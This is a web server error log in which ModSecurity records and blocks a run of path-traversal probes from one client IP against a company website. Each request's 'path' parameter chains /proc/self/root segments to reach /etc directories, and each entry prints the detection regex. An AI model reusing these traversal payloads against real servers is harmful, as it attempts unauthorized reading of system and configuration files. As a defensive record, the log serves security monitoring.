[Mon Mar 16 17:11:50.327881 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:33118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkBrABkC4fWIHEf8ELMwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:51.688197 2026] [:error] [pid 29802:tid 140411725141760] [client 74.7.243.203:33120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkB8_BxrYCr4hPDw8ASQAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:52.986116 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:33126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkCFajLEzk2WiQ-10owwAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:54.382051 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.243.203:33136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkClajLEzk2WiQ-10oxQAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:55.604605 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:33152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkC7ABkC4fWIHEf8ELNQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:11:56.966893 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.243.203:33154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkDEr9dMAiw-8KANNdlwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:11:58.165696 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.243.203:33170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkDqQpVkWug9HeOt9LyAAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:00.199164 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:33178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkD7ABkC4fWIHEf8ELNgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:02.699092 2026] [:error] [pid 15568:tid 140411565680384] [client 74.7.243.203:42390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkEqQpVkWug9HeOt9LygAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:04.016465 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:42404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkFP9ocpUE4ed4uDwI3AAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:05.264944 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:42414] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkFf9ocpUE4ed4uDwI3gAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:06.621210 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:42426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkFv9ocpUE4ed4uDwI4gAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:09.051691 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:42430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkGf9ocpUE4ed4uDwI5AAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:12.842043 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.243.203:52152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkHKTCbgAP5jq5TehC9AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:14.193993 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:52154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkHqTCbgAP5jq5TehC9gAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:15.431281 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.243.203:52168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkH6TCbgAP5jq5TehC-AAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:24.699446 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.243.203:52180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkKI6lpbStxTqkSkuAnQAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:26.019403 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.243.203:52326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkKqQpVkWug9HeOt9L2AAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:27.220419 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.243.203:52330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkK0r9dMAiw-8KANNdmgAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:30.953098 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:52342] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkLtSswJuvopo3lOh1PAAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:36.197835 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:37422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkMtSswJuvopo3lOh1QwAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:37.578949 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:37436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkNf9ocpUE4ed4uDwI7AAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
